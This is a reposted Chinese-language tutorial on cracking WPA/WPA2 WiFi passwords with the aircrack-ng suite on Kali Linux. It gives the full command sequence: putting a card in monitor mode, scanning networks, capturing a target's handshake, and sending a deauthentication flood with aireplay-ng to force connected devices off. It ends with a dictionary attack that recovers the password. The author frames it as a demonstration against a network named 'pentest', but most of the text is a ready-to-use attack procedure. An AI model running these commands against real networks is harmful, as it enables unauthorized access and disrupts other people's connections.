Aircrack-ng破解WPA/WPA2加密WiFi教程（Kali）

本文轉載自查看原文 2018-12-06 11:01 3797

一、說明

以前學Kali，很多人都笑贊“WiFi破解神器”。我很煩，一是我不會破解二是我覺得他們也不會破解三是我隱約覺得所謂的WiFi破解不是什么技術性的操作。

后來基礎知識充分了然后弄了個無線網卡，弄個弱密碼跟着網上教程敲幾條命令就“破解了”，確實不需要什么技術知識也沒什么操作性。

也因此沒做什么記錄，但最近需要演示時發現忘了具體操作步驟，因此重新整理一下記錄下來。

網卡沒必要用什么官方推薦的幾百塊錢的，甚至只在國外賣的。某淘上說支持Kali評論也說可以的基本都沒問題。

二、破解WPA/WPA2類WiFi操作

WEP破解和WPA破解操作有些不一樣，但一是WEP協議有漏洞使用破解很容易現在也基本沒人用了，二是我這里沒有WEP型WiFi，所以這里只講WPA破解。

2.1 查看可用的無線網卡

airmon-ng

2.2 將無線網卡以監聽模式啟動

9表示第9信道（channel 9）。使用iwconfig確認成功開啟，主要表現是網卡名由wlan0變為wlan0mon，Mode值為Monitor

airmon-ng start wlan0 9
iwconfig

2.3 掃描周圍WiFi

airodump-ng wlan0mon

BSSID----wifi的mac地址、PWR----信號強度（結果一般是按強度排序）、Data----監聽期間流量總合、CH----wifi所用信道、ENC----加密算法、ESSID----wifi名稱

看到自己要破解的wifi后直接按Ctrl+C終止命令即可。我們這里的目標是名為pentest的wifi，其BSSID為B0:D5:9D:42:FA:A3，信道為11

2.4 開始抓取握手包並保存成文件

# -c指定信道，一定要是上一步查到的要破解的wifi所用信道
# -bssid指定bssid值，一定要是上一步查到的要破解的wifi的bssid
# -w指定捕獲的握手到保存到的文件名
airodump-ng -c 11 --bssid B0:D5:9D:42:FA:A3 -w /root/Desktop/wifi_ivs_file wlan0mon

2.5 主動出擊獲取握手包【可選】

在上一步中我們是被動等待，我們何時能抓取到握手包依賴於何時有設備與該wifi完成成功的認證。

但對於上一步這種有已連接設備的wifi，其實我們可以使用aireplay-ng進行deauth洪水攻擊使已連接他的設備掉線，掉線設備一般會自動重新連接wifi這樣我們就能輕松獲取握手包。

保持上步抓包命令不中斷，新打開一個窗口執行：

# -0表示通知設備斷開連接
# 10表示deauth攻擊次數，小點大點都行吧
# -a指定仿造的wifi的mac地址（即bssid）
# -c表示要讓認證失效的設備的mac地址，在上一步中可以看到
aireplay-ng -0 10 -a B0:D5:9D:42:FA:A3 -c C4:F0:81:02:87:5E wlan0mon

如下圖所示，我們抓到了讓其重新認證的B0:D5:9D:42:FA:A3的握手包。使用Ctrl+C終止抓包命令即可

此時會在指定的目錄產生以下四個文件（每執行一次抓包命令就會產生一組，所以抓包時要注意自己是第幾次執行的；不管也行下一步執定文件時使用*號通配符即可）

2.6 使用字典文件暴力破解密碼

# -w指定要使用口令字典文件
# -b指定要目標wifi的mac地址（亦即bssid）
# wifi_ivs_file*.cap是抓取到握手包的數據包文件，*是通配符
aircrack-ng -w /usr/share/nmap/nselib/data/passwords.lst -b B0:D5:9D:42:FA:A3 /root/Desktop/wifi_ivs_file*.cap

如果字典文件中存在wifi的密碼，那就能找到wifi的密碼，如果不包含那就找不到。（所以籠統地講wifi成功破解率依賴於字典大小）